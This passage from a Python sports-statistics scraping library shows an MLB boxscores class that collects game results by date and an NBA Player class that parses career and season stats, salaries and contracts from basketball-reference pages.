particular day, the list will be empty.
Parameters
----------
date : datetime object
The date to search for any matches. The month, day, and year are
required for the search, but time is not factored into the search.
end_date : datetime object (optional)
Optionally specify an end date to iterate until. All boxscores
starting from the date specified in the 'date' parameter up to and
including the boxscores specified in the 'end_date' parameter will be
pulled. If left empty, or if 'end_date' is prior to 'date', only the
games from the day specified in the 'date' parameter will be saved.
"""
def __init__(self, date, end_date=None):
self._boxscores = {}
self._find_games(date, end_date)
@property
def games(self):
"""
Returns a ``dictionary`` object representing all of the games played on
the requested day. Dictionary is in the following format::
{
'date': [ # 'date' is the string date in format 'MM-DD-YYYY'
{
'home_name': Name of the home team, such as 'New York
Yankees' (`str`),
'home_abbr': Abbreviation for the home team, such as
'NYY' (`str`),
'away_name': Name of the away team, such as 'Houston
Astros' (`str`),
'away_abbr': Abbreviation for the away team, such as
'HOU' (`str`),
'boxscore': String representing the boxscore URI, such
as 'SLN/SLN201807280' (`str`),
'winning_name': Full name of the winning team, such as
'New York Yankees' (`str`),
'winning_abbr': Abbreviation for the winning team, such
as 'NYY' (`str`),
'losing_name': Full name of the losing team, such as
                        'Houston Astros' (`str`),
'losing_abbr': Abbreviation for the losing team, such
as 'HOU' (`str`),
'home_score': Integer score for the home team (`int`),
'away_score': Integer score for the away team (`int`)
},
{ ... },
...
]
}
If no games were played on 'date', the list for ['date'] will be empty.
"""
return self._boxscores
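    # Access pattern sketch (date illustrative):
    #   Boxscores(datetime(2018, 6, 7)).games['6-7-2018']
    # yields the list of game dictionaries for June 7, 2018, and each entry's
    # 'boxscore' value can be passed straight to the Boxscore class.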
def _create_url(self, date):
"""
Build the URL based on the passed datetime object.
In order to get the proper boxscore page, the URL needs to include the
requested month, day, and year.
Parameters
----------
date : datetime object
The date to search for any matches. The month, day, and year are
required for the search, but time is not factored into the search.
Returns
-------
string
Returns a ``string`` of the boxscore URL including the requested
date.
"""
return BOXSCORES_URL % (date.year, date.month, date.day)
def _get_requested_page(self, url):
"""
Get the requested page.
Download the requested page given the created URL and return a PyQuery
object.
Parameters
----------
url : string
The URL containing the boxscores to find.
Returns
-------
PyQuery object
A PyQuery object containing the HTML contents of the requested
page.
"""
return pq(url)
def _get_boxscore_uri(self, url):
"""
Find the boxscore URI.
Given the boxscore tag for a game, parse the embedded URI for the
boxscore.
Parameters
----------
url : PyQuery object
A PyQuery object containing the game's boxscore tag which has the
boxscore URI embedded within it.
Returns
-------
string
Returns a ``string`` containing the link to the game's boxscore
page.
"""
uri = re.sub(r'.*/boxes/', '', str(url))
uri = re.sub(r'\.shtml.*', '', uri).strip()
return uri
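    # For example, an href ending in '/boxes/SLN/SLN201807280.shtml' reduces
    # to 'SLN/SLN201807280' after the two substitutions above.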
def _parse_abbreviation(self, abbr):
"""
Parse a team's abbreviation.
Given the team's HTML name tag, parse their abbreviation.
Parameters
----------
abbr : string
A string of a team's HTML name tag.
Returns
-------
string
Returns a ``string`` of the team's abbreviation.
"""
abbr = re.sub(r'.*/teams/', '', str(abbr))
abbr = re.sub(r'/.*', '', abbr)
return abbr
def _get_name(self, name):
"""
Find a team's name and abbreviation.
        Given the team's HTML name tag, determine their name and abbreviation.
Parameters
----------
name : PyQuery object
A PyQuery object of a team's HTML name tag in the boxscore.
Returns
-------
tuple
Returns a tuple containing the name and abbreviation for a team.
Tuple is in the following order: Team Name, Team Abbreviation.
"""
team_name = name.text()
abbr = self._parse_abbreviation(name)
return team_name, abbr
def _get_score(self, score_link):
"""
Find a team's final score.
Given an HTML string of a team's boxscore, extract the integer
representing the final score and return the number.
Parameters
----------
score_link : string
An HTML string representing a team's final score in the format
'<td class="right">NN</td>' where 'NN' is the team's score.
Returns
-------
int
Returns an int representing the team's final score in runs.
"""
score = score_link.replace('<td class="right">', '')
score = score.replace('</td>', '')
return int(score)
def _get_team_details(self, game):
"""
Find the names and abbreviations for both teams in a game.
Using the HTML contents in a boxscore, find the name and abbreviation
for both teams.
Parameters
----------
game : PyQuery object
A PyQuery object of a single boxscore containing information about
both teams.
Returns
-------
tuple
            Returns a tuple containing the names, abbreviations, and scores
            of both teams in the following order: Away Name, Away
            Abbreviation, Away Score, Home Name, Home Abbreviation, Home
            Score.
"""
links = [i for i in game('td a').items()]
# The away team is the first link in the boxscore
away = links[0]
# The home team is the last (3rd) link in the boxscore
home = links[-1]
scores = re.findall(r'<td class="right">\d+</td>', str(game))
away_score = self._get_score(scores[0])
home_score = self._get_score(scores[1])
away_name, away_abbr = self._get_name(away)
home_name, home_abbr = self._get_name(home)
return (away_name, away_abbr, away_score, home_name, home_abbr,
home_score)
def _get_team_results(self, team_result_html):
"""
Extract the winning or losing team's name and abbreviation.
Depending on which team's data field is passed (either the winner or
loser), return the name and abbreviation of that team to denote which
team won and which lost the game.
Parameters
----------
team_result_html : PyQuery object
A PyQuery object representing either the winning or losing team's
data field within the boxscore.
Returns
-------
tuple
Returns a tuple of the team's name followed by the abbreviation.
"""
link = [i for i in team_result_html('td a').items()]
        # If there are no links, the boxscore is likely malformed and can't be
# parsed. In this case, the boxscore should be skipped.
if len(link) < 1:
return None
name, abbreviation = self._get_name(link[0])
return name, abbreviation
def _extract_game_info(self, games):
"""
Parse game information from all boxscores.
Find the major game information for all boxscores listed on a
particular boxscores webpage and return the results in a list.
Parameters
----------
games : generator
A generator where each element points to a boxscore on the parsed
boxscores webpage.
Returns
-------
list
Returns a ``list`` of dictionaries where each dictionary contains
the name and abbreviations for both the home and away teams, and a
link to the game's boxscore.
"""
all_boxscores = []
for game in games:
details = self._get_team_details(game)
away_name, away_abbr, away_score, home_name, home_abbr, \
home_score = details
boxscore_url = game('td[class="right gamelink"] a')
boxscore_uri = self._get_boxscore_uri(boxscore_url)
winner = self._get_team_results(game('tr[class="winner"]'))
# Occurs when information couldn't be parsed from the boxscore and
# the game should be skipped to avoid conflicts populating the
# game information.
if not winner:
continue
winning_name, winning_abbreviation = winner
loser = self._get_team_results(game('tr[class="loser"]'))
# Occurs when information couldn't be parsed from the boxscore and
# the game should be skipped to avoid conflicts populating the
# game information.
if not loser:
continue
losing_name, losing_abbreviation = loser
game_info = {
'boxscore': boxscore_uri,
'away_name': away_name,
'away_abbr': away_abbr,
'away_score': away_score,
'home_name': home_name,
'home_abbr': home_abbr,
'home_score': home_score,
'winning_name': winning_name,
'winning_abbr': winning_abbreviation,
'losing_name': losing_name,
'losing_abbr': losing_abbreviation
}
all_boxscores.append(game_info)
return all_boxscores
def _find_games(self, date, end_date):
"""
Retrieve all major games played on a given day.
Builds a URL based on the requested date and downloads the HTML
contents before parsing any and all games played during that day. Any
games that are found are added to the boxscores dictionary with
high-level game information such as the home and away team names and a
link to the boxscore page.
Parameters
----------
date : datetime object
The date to search for any matches. The month, day, and year are
required for the search, but time is not factored into the search.
end_date : datetime object (optional)
Optionally specify an end date to iterate until. All boxscores
starting from the date specified in the 'date' parameter up to and
including the boxscores specified in the 'end_date' parameter will
be pulled. If left empty, or if 'end_date' is prior to 'date', only
the games from the day specified in the 'date' parameter will be
saved.
"""
# Set the end date to the start date if the end date is before the
# start date.
if not end_date or date > end_date:
end_date = date
date_step = date
while date_step <= end_date:
url = self._create_url(date_step)
page = self._get_requested_page(url)
games = page('table[class="teams"]').items()
boxscores = self._extract_game_info(games)
timestamp = '%s-%s-%s' % (date_step.month, date_step.day,
date_step.year)
self._boxscores[timestamp] = boxscores
date_step += timedelta(days=1)
```
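A minimal usage sketch for the `Boxscore` and `Boxscores` classes above. It
assumes the module is importable as `sportsreference.mlb.boxscore` (mirroring
the repository layout) and that sports-reference.com is reachable; the URI and
dates are illustrative.
```python
from datetime import datetime

from sportsreference.mlb.boxscore import Boxscore, Boxscores

# Pull a single game's statistics using its boxscore URI.
game = Boxscore('BOS/BOS201806070')
print(game.winner, game.away_runs, game.home_runs)
# dataframe returns a single-row pandas DataFrame indexed by the URI.
stats = game.dataframe

# Find every game played over a range of days. Keys in the resulting
# dictionary are 'M-D-YYYY' strings, one per day in the range.
schedule = Boxscores(datetime(2018, 6, 7), datetime(2018, 6, 8))
for day, matchups in schedule.games.items():
    for matchup in matchups:
        print(day, matchup['away_abbr'], '@', matchup['home_abbr'])
```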
#### File: sportsreference/nba/roster.py
```python
import pandas as pd
import re
from datetime import datetime
from functools import wraps
from lxml.etree import ParserError, XMLSyntaxError
from pyquery import PyQuery as pq
from .. import utils
from .constants import NATIONALITY, PLAYER_SCHEME, PLAYER_URL, ROSTER_URL
from six.moves.urllib.error import HTTPError
def _cleanup(prop):
try:
prop = prop.replace('%', '')
prop = prop.replace('$', '')
prop = prop.replace(',', '')
return prop.replace('+', '')
    # Occurs when a value is of NoneType. When that happens, return a blank
    # string as whatever came in had an incomplete value.
except AttributeError:
return ''
def _int_property_decorator(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return int(value)
except ValueError:
# If there is no value, default to None
return None
return wrapper
def _int_property_decorator_default_zero(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return int(value)
except ValueError:
# If there is no value, default to 0
return 0
return wrapper
def _float_property_decorator(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return float(value)
except ValueError:
# If there is no value, default to None
return None
return wrapper
def _most_recent_decorator(func):
@property
@wraps(func)
def wrapper(*args):
season = args[0]._most_recent_season
seasons = args[0]._season
index = seasons.index(season)
prop = func(*args)
return prop[index]
return wrapper
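# Usage sketch for the decorators above: each one wraps a property whose raw
# value is a list of per-season strings and returns the entry at the
# instance's current _index, converted to the named type (or the stated
# default when conversion fails). For example:
#
#     @_int_property_decorator
#     def games_played(self):
#         return self._games_played  # e.g. ['72', '78', ''] -> 72, 78, None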
class Player(object):
"""
Get player information and stats for all seasons.
    Given a player ID, such as 'hardeja01' for James Harden, capture all
relevant stats and information like name, nationality, height/weight,
career three-pointers, last season's offensive rebounds, salary, contract
amount, and much more.
By default, the class instance will return the player's career stats, but
single-season stats can be found by calling the instance with the requested
season as denoted on basketball-reference.com.
Parameters
----------
player_id : string
A player's ID according to basketball-reference.com, such as
        'hardeja01' for James Harden. The player ID can be found by navigating
to the player's stats page and getting the string between the final
slash and the '.html' in the URL. In general, the ID is in the format
'LLLLLFFNN' where 'LLLLL' are the first 5 letters in the player's last
        name, 'FF' are the first 2 letters in the player's first name, and
'NN' is a number starting at '01' for the first time that player ID has
been used and increments by 1 for every successive player.
"""
def __init__(self, player_id):
self._most_recent_season = ''
self._index = None
self._player_id = player_id
self._season = None
self._name = None
self._team_abbreviation = None
self._position = None
self._height = None
self._weight = None
self._birth_date = None
self._nationality = None
self._games_played = None
self._games_started = None
self._minutes_played = None
self._field_goals = None
self._field_goal_attempts = None
self._field_goal_percentage = None
self._three_pointers = None
self._three_point_attempts = None
self._three_point_percentage = None
self._two_pointers = None
self._two_point_attempts = None
self._two_point_percentage = None
self._effective_field_goal_percentage = None
self._free_throws = None
self._free_throw_attempts = None
self._free_throw_percentage = None
self._offensive_rebounds = None
self._defensive_rebounds = None
self._total_rebounds = None
self._assists = None
self._steals = None
self._blocks = None
self._turnovers = None
self._personal_fouls = None
self._points = None
self._player_efficiency_rating = None
self._true_shooting_percentage = None
self._three_point_attempt_rate = None
self._free_throw_attempt_rate = None
self._offensive_rebound_percentage = None
self._defensive_rebound_percentage = None
self._total_rebound_percentage = None
self._assist_percentage = None
self._steal_percentage = None
self._block_percentage = None
self._turnover_percentage = None
self._usage_percentage = None
self._offensive_win_shares = None
self._defensive_win_shares = None
self._win_shares = None
self._win_shares_per_48_minutes = None
self._offensive_box_plus_minus = None
self._defensive_box_plus_minus = None
self._box_plus_minus = None
self._value_over_replacement_player = None
self._shooting_distance = None
self._percentage_shots_two_pointers = None
self._percentage_zero_to_three_footers = None
self._percentage_three_to_ten_footers = None
self._percentage_ten_to_sixteen_footers = None
self._percentage_sixteen_foot_plus_two_pointers = None
self._percentage_shots_three_pointers = None
self._field_goal_perc_zero_to_three_feet = None
self._field_goal_perc_three_to_ten_feet = None
self._field_goal_perc_ten_to_sixteen_feet = None
self._field_goal_perc_sixteen_foot_plus_two_pointers = None
self._two_pointers_assisted_percentage = None
self._percentage_field_goals_as_dunks = None
self._dunks = None
self._three_pointers_assisted_percentage = None
self._percentage_of_three_pointers_from_corner = None
self._three_point_shot_percentage_from_corner = None
self._half_court_heaves = None
self._half_court_heaves_made = None
self._point_guard_percentage = None
self._shooting_guard_percentage = None
self._small_forward_percentage = None
self._power_forward_percentage = None
self._center_percentage = None
self._on_court_plus_minus = None
self._net_plus_minus = None
self._passing_turnovers = None
self._lost_ball_turnovers = None
self._other_turnovers = None
self._shooting_fouls = None
self._blocking_fouls = None
self._offensive_fouls = None
self._take_fouls = None
self._points_generated_by_assists = None
self._shooting_fouls_drawn = None
self._and_ones = None
self._shots_blocked = None
self._salary = None
self._contract = None
self._parse_player_data()
self._find_initial_index()
def _build_url(self):
"""
Create the player's URL to pull stats from.
The player's URL requires the first letter of the player's last name
followed by the player ID.
Returns
-------
string
The string URL for the player's stats page.
"""
# The first letter of the player's last name is used to sort the player
# list and is a part of the URL.
first_character = self._player_id[0]
return PLAYER_URL % (first_character, self._player_id)
def _retrieve_html_page(self):
"""
Download the requested player's stats page.
Download the requested page and strip all of the comment tags before
returning a pyquery object which will be used to parse the data.
Returns
-------
PyQuery object
            The requested page is returned as a queryable PyQuery object with
the comment tags removed.
"""
url = self._build_url()
try:
url_data = pq(url)
except HTTPError:
return None
return pq(utils._remove_html_comment_tags(url_data))
def _parse_season(self, row):
"""
Parse the season string from the table.
The season is generally located in the first column of the stats tables
        and should be parsed to denote which season the metrics are being
        pulled from.
Parameters
----------
row : PyQuery object
A PyQuery object of a single row in a stats table.
Returns
-------
string
A string representation of the season in the format 'YYYY-YY', such
as '2017-18'.
"""
return utils._parse_field(PLAYER_SCHEME, row, 'season')
def _combine_season_stats(self, table_rows, career_stats, all_stats_dict):
"""
Combine all stats for each season.
        Since all of the stats are spread across multiple tables, they should
        be combined into a single structure which can be used to easily query
        all stats at once.
Parameters
----------
table_rows : generator
A generator where each element is a row in a stats table.
career_stats : generator
A generator where each element is a row in the footer of a stats
table. Career stats are kept in the footer, hence the usage.
all_stats_dict : dictionary
A dictionary of all stats separated by season where each key is the
season ``string``, such as '2017-18', and the value is a
            ``dictionary`` with a 'data' key whose value is a ``string``
            containing all of the data.
Returns
-------
dictionary
Returns an updated version of the passed all_stats_dict which
includes more metrics from the provided table.
"""
most_recent_season = ''
for row in table_rows:
season = self._parse_season(row)
try:
all_stats_dict[season]['data'] += str(row)
except KeyError:
all_stats_dict[season] = {'data': str(row)}
most_recent_season = season
self._most_recent_season = most_recent_season
try:
all_stats_dict['career']['data'] += str(next(career_stats))
except KeyError:
all_stats_dict['career'] = {'data': str(next(career_stats))}
return all_stats_dict
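    # After processing, all_stats_dict resembles (sketch, row HTML elided):
    #   {'2017-18': {'data': '<tr>...totals...</tr><tr>...advanced...</tr>'},
    #    'career': {'data': '<tr>...career footer...</tr>'}}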
def _combine_all_stats(self, player_info):
"""
Pull stats from all tables into single data structure.
Pull the stats from all of the requested tables into a dictionary that
is separated by season to allow easy queries of the player's stats for
each season.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing all of the stats information for the
requested player.
Returns
-------
dictionary
Returns a dictionary where all stats from each table are combined
by season to allow easy queries by year.
"""
all_stats_dict = {}
for table_id in ['totals', 'advanced', 'shooting', 'advanced_pbp',
'all_salaries']:
try:
table_items = utils._get_stats_table(player_info,
'table#%s' % table_id)
career_items = utils._get_stats_table(player_info,
'table#%s' % table_id,
footer=True)
# Error is thrown when player does not have the corresponding
# table, such as a rookie.
except (ParserError, XMLSyntaxError):
continue
all_stats_dict = self._combine_season_stats(table_items,
career_items,
all_stats_dict)
return all_stats_dict
def _parse_nationality(self, player_info):
"""
Parse the player's nationality.
The player's nationality is denoted by a flag in the information
        section with a country code for each nation. The country code needs to
        be pulled and then matched to find the player's home country. Once found,
the '_nationality' attribute is set for the player.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
"""
for span in player_info('span').items():
if 'class="f-i' in str(span):
nationality = span.text()
nationality = NATIONALITY[nationality]
setattr(self, '_nationality', nationality)
break
def _parse_player_information(self, player_info, field):
"""
Parse general player information.
Parse general player information such as height, weight, and name. The
attribute for the requested field will be set with the value prior to
returning.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
field : string
A string of the attribute to parse, such as 'weight'.
"""
short_field = str(field)[1:]
value = utils._parse_field(PLAYER_SCHEME, player_info, short_field)
setattr(self, field, value)
def _parse_birth_date(self, player_info):
"""
Parse the player's birth date.
Pull the player's birth date from the player information and set the
'_birth_date' attribute with the value prior to returning.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
"""
date = player_info('span[itemprop="birthDate"]').attr('data-birth')
setattr(self, '_birth_date', date)
def _parse_contract_headers(self, table):
"""
Parse the years on the contract.
The years are listed as the headers on the contract. The first header
contains 'Team' which specifies the player's current team and should
not be included in the years.
Parameters
----------
table : PyQuery object
A PyQuery object containing the contract table.
Returns
-------
list
Returns a list where each element is a string denoting the season,
such as '2017-18'.
"""
years = [i.text() for i in table('th').items()]
years.remove('Team')
return years
def _parse_contract_wages(self, table):
"""
Parse the wages on the contract.
The wages are listed as the data points in the contract table. Any
        cells whose values don't start with a '$' sign are likely not valid
        and should be dropped.
Parameters
----------
table : PyQuery object
A PyQuery object containing the contract table.
Returns
-------
list
Returns a list of all wages where each element is a string denoting
the dollar amount, such as '$40,000,000'.
"""
        wages = [i.text() for i in table('td').items()
                 if i.text().startswith('$')]
        return wages
def _combine_contract(self, years, wages):
"""
Combine the contract wages and year.
Match the wages with the year and add to a dictionary representing the
player's contract.
Parameters
----------
years : list
A list where each element is a string denoting the season, such as
'2017-18'.
wages : list
A list of all wages where each element is a string denoting the
dollar amount, such as '$40,000,000'.
Returns
-------
dictionary
Returns a dictionary representing the player's contract where each
key is a ``string`` of the season, such as '2017-18' and each value
is a ``string`` of the wages, such as '$40,000,000'.
"""
        return dict(zip(years, wages))
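    # Sketch with illustrative figures:
    #   _combine_contract(['2017-18', '2018-19'],
    #                     ['$28,000,000', '$30,000,000'])
    #   -> {'2017-18': '$28,000,000', '2018-19': '$30,000,000'}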
def _parse_contract(self, player_info):
"""
Parse the player's contract.
Depending on the player's contract status, a contract table is located
at the bottom of the stats page and includes player wages by season. If
found, create a dictionary housing the wages by season.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
"""
tables = player_info('table').items()
for table in tables:
            id_attr = table.attr('id')
            if id_attr and id_attr.startswith('contracts_'):
                years = self._parse_contract_headers(table)
                wages = self._parse_contract_wages(table)
                contract = self._combine_contract(years, wages)
                # If the contract is empty, the player likely doesn't have
                # a contract and should have a value of None instead.
                if contract == {}:
                    contract = None
                setattr(self, '_contract', contract)
                break
def _parse_player_data(self):
"""
Parse all player information and set attributes.
Pull the player's HTML stats page and go through each class attribute
to parse the data from the HTML page and set attribute value with the
result.
"""
player_info = self._retrieve_html_page()
all_stats_dict = self._combine_all_stats(player_info)
for field in self.__dict__:
short_field = str(field)[1:]
            if short_field in ('player_id', 'index', 'most_recent_season'):
                continue
            if short_field in ('name', 'weight', 'height'):
                self._parse_player_information(player_info, field)
                continue
if short_field == 'nationality':
self._parse_nationality(player_info)
continue
if short_field == 'birth_date':
self._parse_birth_date(player_info)
continue
if short_field == 'contract':
self._parse_contract(player_info)
continue
field_stats = []
for year, data in all_stats_dict.items():
stats = pq(data['data'])
value = utils._parse_field(PLAYER_SCHEME, stats, short_field)
field_stats.append(value)
setattr(self, field, field_stats)
def _find_initial_index(self):
"""
Find the index of career stats.
When the Player class is instantiated, the default stats to pull are
        the player's career stats. When this method is called, the index of
        the 'Career' element is stored as the default index value.
"""
        for index, season in enumerate(self._season):
            if season == 'Career':
                self._index = index
                break
def __call__(self, requested_season=''):
"""
Specify a different season to pull stats from.
A different season can be requested by passing the season string, such
as '2017-18' to the class instance.
Parameters
----------
requested_season : string (optional)
A string of the requested season to query, such as '2017-18'. If
left blank or 'Career' is passed, the career stats will be used for
stats queries.
Returns
-------
Player class instance
Returns the class instance with the updated stats being referenced.
"""
if requested_season.lower() == 'career' or \
requested_season == '':
requested_season = 'Career'
        for index, season in enumerate(self._season):
            if season == requested_season:
                self._index = index
                break
return self
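    # Usage sketch: player = Player('hardeja01'); player('2017-18').points
    # switches the internal index to the 2017-18 row before the points
    # property is evaluated, while player() restores the career totals.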
def _dataframe_fields(self):
"""
Creates a dictionary of all fields to include with DataFrame.
        Since the results of calls to class properties change based on the
        class index value, the dictionary should be regenerated every time
        the index is changed while the dataframe property is being built.
Returns
-------
dictionary
Returns a dictionary where the keys are the shortened ``string``
attribute names and the values are the actual value for each
attribute for the specified index.
"""
fields_to_include = {
'and_ones': self.and_ones,
'assist_percentage': self.assist_percentage,
'assists': self.assists,
'block_percentage': self.block_percentage,
'blocking_fouls': self.blocking_fouls,
'blocks': self.blocks,
'box_plus_minus': self.box_plus_minus,
'center_percentage': self.center_percentage,
'defensive_box_plus_minus': self.defensive_box_plus_minus,
'defensive_rebound_percentage': self.defensive_rebound_percentage,
'defensive_rebounds': self.defensive_rebounds,
'defensive_win_shares': self.defensive_win_shares,
'dunks': self.dunks,
'effective_field_goal_percentage':
self.effective_field_goal_percentage,
'field_goal_attempts': self.field_goal_attempts,
'field_goal_perc_sixteen_foot_plus_two_pointers':
self.field_goal_perc_sixteen_foot_plus_two_pointers,
'field_goal_perc_ten_to_sixteen_feet':
self.field_goal_perc_ten_to_sixteen_feet,
'field_goal_perc_three_to_ten_feet':
self.field_goal_perc_three_to_ten_feet,
'field_goal_perc_zero_to_three_feet':
self.field_goal_perc_zero_to_three_feet,
'field_goal_percentage': self.field_goal_percentage,
'field_goals': self.field_goals,
'free_throw_attempt_rate': self.free_throw_attempt_rate,
'free_throw_attempts': self.free_throw_attempts,
'free_throw_percentage': self.free_throw_percentage,
'free_throws': self.free_throws,
'games_played': self.games_played,
'games_started': self.games_started,
'half_court_heaves': self.half_court_heaves,
'half_court_heaves_made': self.half_court_heaves_made,
'height': self.height,
'lost_ball_turnovers': self.lost_ball_turnovers,
'minutes_played': self.minutes_played,
'nationality': self.nationality,
'net_plus_minus': self.net_plus_minus,
'offensive_box_plus_minus': self.offensive_box_plus_minus,
'offensive_fouls': self.offensive_fouls,
'offensive_rebound_percentage': self.offensive_rebound_percentage,
'offensive_rebounds': self.offensive_rebounds,
'offensive_win_shares': self.offensive_win_shares,
'on_court_plus_minus': self.on_court_plus_minus,
'other_turnovers': self.other_turnovers,
'passing_turnovers': self.passing_turnovers,
'percentage_field_goals_as_dunks':
self.percentage_field_goals_as_dunks,
'percentage_of_three_pointers_from_corner':
self.percentage_of_three_pointers_from_corner,
'percentage_shots_three_pointers':
self.percentage_shots_three_pointers,
'percentage_shots_two_pointers':
self.percentage_shots_two_pointers,
'percentage_sixteen_foot_plus_two_pointers':
self.percentage_sixteen_foot_plus_two_pointers,
'percentage_ten_to_sixteen_footers':
self.percentage_ten_to_sixteen_footers,
'percentage_three_to_ten_footers':
self.percentage_three_to_ten_footers,
'percentage_zero_to_three_footers':
self.percentage_zero_to_three_footers,
'personal_fouls': self.personal_fouls,
'player_efficiency_rating': self.player_efficiency_rating,
'player_id': self.player_id,
'point_guard_percentage': self.point_guard_percentage,
'points': self.points,
'points_generated_by_assists': self.points_generated_by_assists,
'position': self.position,
'power_forward_percentage': self.power_forward_percentage,
'salary': self.salary,
'shooting_distance': self.shooting_distance,
'shooting_fouls': self.shooting_fouls,
'shooting_fouls_drawn': self.shooting_fouls_drawn,
'shooting_guard_percentage': self.shooting_guard_percentage,
'shots_blocked': self.shots_blocked,
'small_forward_percentage': self.small_forward_percentage,
'steal_percentage': self.steal_percentage,
'steals': self.steals,
'take_fouls': self.take_fouls,
'team_abbreviation': self.team_abbreviation,
'three_point_attempt_rate': self.three_point_attempt_rate,
'three_point_attempts': self.three_point_attempts,
'three_point_percentage': self.three_point_percentage,
'three_point_shot_percentage_from_corner':
self.three_point_shot_percentage_from_corner,
'three_pointers': self.three_pointers,
'three_pointers_assisted_percentage':
self.three_pointers_assisted_percentage,
'total_rebound_percentage': self.total_rebound_percentage,
'total_rebounds': self.total_rebounds,
'true_shooting_percentage': self.true_shooting_percentage,
'turnover_percentage': self.turnover_percentage,
'turnovers': self.turnovers,
'two_point_attempts': self.two_point_attempts,
'two_point_percentage': self.two_point_percentage,
'two_pointers': self.two_pointers,
'two_pointers_assisted_percentage':
self.two_pointers_assisted_percentage,
'usage_percentage': self.usage_percentage,
'value_over_replacement_player':
self.value_over_replacement_player,
'weight': self.weight,
'win_shares': self.win_shares,
'win_shares_per_48_minutes': self.win_shares_per_48_minutes
}
return fields_to_include
@property
def dataframe(self):
"""
Returns a ``pandas DataFrame`` containing all other relevant class
properties and values where each index is a different season plus the
career stats.
"""
temp_index = self._index
rows = []
indices = []
for season in self._season:
self._index = self._season.index(season)
rows.append(self._dataframe_fields())
indices.append(season)
self._index = temp_index
        return pd.DataFrame(rows, index=indices)
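    # Sketch: player.dataframe.loc['2017-18'] (season illustrative) selects a
    # single season's row, while player.dataframe.loc['Career'] selects the
    # career totals.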
@property
def player_id(self):
"""
Returns a ``string`` of the player's ID on sports-reference, such as
        'hardeja01' for James Harden.
"""
return self._player_id
@property
def season(self):
"""
Returns a ``string`` of the season in the format 'YYYY-YY', such as
'2017-18'. If no season was requested, the career stats will be
returned for the player and the season will default to 'Career'.
"""
return self._season[self._index]
@property
def name(self):
"""
        Returns a ``string`` of the player's name, such as 'James Harden'.
"""
return self._name
@property
def team_abbreviation(self):
"""
        Returns a ``string`` of the abbreviation for the team the player plays
        for, such as 'HOU' for James Harden.
"""
return self._team_abbreviation[self._index]
@_most_recent_decorator
def position(self):
"""
Returns a ``string`` constant of the player's primary position.
"""
return self._position
@property
def height(self):
"""
Returns a ``string`` of the player's height in the format
"feet-inches".
"""
return self._height
@property
def weight(self):
"""
Returns an ``int`` of the player's weight in pounds.
"""
return int(self._weight.replace('lb', ''))
@property
def birth_date(self):
"""
Returns a ``datetime`` object of the day and year the player was born.
"""
return datetime.strptime(self._birth_date, '%Y-%m-%d')
@property
def nationality(self):
"""
Returns a ``string`` constant denoting which country the player
originates from.
"""
return self._nationality
@_int_property_decorator
def games_played(self):
"""
Returns an ``int`` of the number of games the player participated in.
"""
return self._games_played
@_int_property_decorator
def games_started(self):
"""
Returns an ``int`` of the number of games the player started.
"""
return self._games_started
@_int_property_decorator
def minutes_played(self):
"""
Returns an ``int`` of the total number of minutes the player played.
"""
return self._minutes_played
@_int_property_decorator
def field_goals(self):
"""
Returns an ``int`` of the total number of field goals the player
scored.
"""
return self._field_goals
@_int_property_decorator
def field_goal_attempts(self):
"""
Returns an ``int`` of the total number of field goals the player
attempted during the season.
"""
return self._field_goal_attempts
@_float_property_decorator
def field_goal_percentage(self):
"""
Returns a ``float`` of the player's field goal percentage during the
season. Percentage ranges from 0-1.
"""
return self._field_goal_percentage
@_int_property_decorator
def three_pointers(self):
"""
Returns an ``int`` of the total number of three point field goals the
player made.
"""
return self._three_pointers
@_int_property_decorator
def three_point_attempts(self):
"""
Returns an ``int`` of the total number of three point field goals the
player attempted during the season.
"""
return self._three_point_attempts
@_float_property_decorator
def three_point_percentage(self):
"""
Returns a ``float`` of the player's three point field goal percentage
during the season. Percentage ranges from 0-1.
"""
return self._three_point_percentage
@_int_property_decorator
def two_pointers(self):
"""
Returns an ``int`` of the total number of two point field goals the
player made.
"""
return self._two_pointers
@_int_property_decorator
def two_point_attempts(self):
"""
Returns an ``int`` of the total number of two point field goals the
player attempted during the season.
"""
return self._two_point_attempts
@_float_property_decorator
def two_point_percentage(self):
"""
Returns a ``float`` of the player's two point field goal percentage
during the season. Percentage ranges from 0-1.
"""
return self._two_point_percentage
@_float_property_decorator
def effective_field_goal_percentage(self):
"""
Returns a ``float`` of the player's field goal percentage while giving
extra weight to 3-point field goals. Percentage ranges from 0-1.
"""
return self._effective_field_goal_percentage
@_int_property_decorator
def free_throws(self):
"""
Returns an ``int`` of the total number of free throws the player made
during the season.
"""
return self._free_throws
@_int_property_decorator
def free_throw_attempts(self):
"""
Returns an ``int`` of the total number of free throws the player
attempted during the season.
"""
return self._free_throw_attempts
@_float_property_decorator
def free_throw_percentage(self):
"""
Returns a ``float`` of the player's free throw percentage during the
season. Percentage ranges from 0-1.
"""
return self._free_throw_percentage
@_int_property_decorator
def offensive_rebounds(self):
"""
Returns an ``int`` of the total number of offensive rebounds the player
grabbed during the season.
"""
return self._offensive_rebounds
@_int_property_decorator
def defensive_rebounds(self):
"""
Returns an ``int`` of the total number of defensive rebounds the player
grabbed during the season.
"""
return self._defensive_rebounds
@_int_property_decorator
def total_rebounds(self):
"""
Returns an ``int`` of the total number of offensive and defensive
rebounds the player grabbed during the season.
"""
return self._total_rebounds
@_int_property_decorator
def assists(self):
"""
Returns an ``int`` of the total number of assists the player tallied
during the season.
"""
return self._assists
@_int_property_decorator
def steals(self):
"""
Returns an ``int`` of the total number of steals the player tallied
during the season.
"""
return self._steals
@_int_property_decorator
def blocks(self):
"""
Returns an ``int`` of the total number of shots the player blocked
during the season.
"""
return self._blocks
@_int_property_decorator
def turnovers(self):
"""
Returns an ``int`` of the total number of times the player turned the
ball over during the season for any reason.
"""
return self._turnovers
@_int_property_decorator
def personal_fouls(self):
"""
Returns an ``int`` of the total number of personal fouls the player
committed during the season.
"""
return self._personal_fouls
@_int_property_decorator
def points(self):
"""
Returns an ``int`` of the total number of points the player scored
during the season.
"""
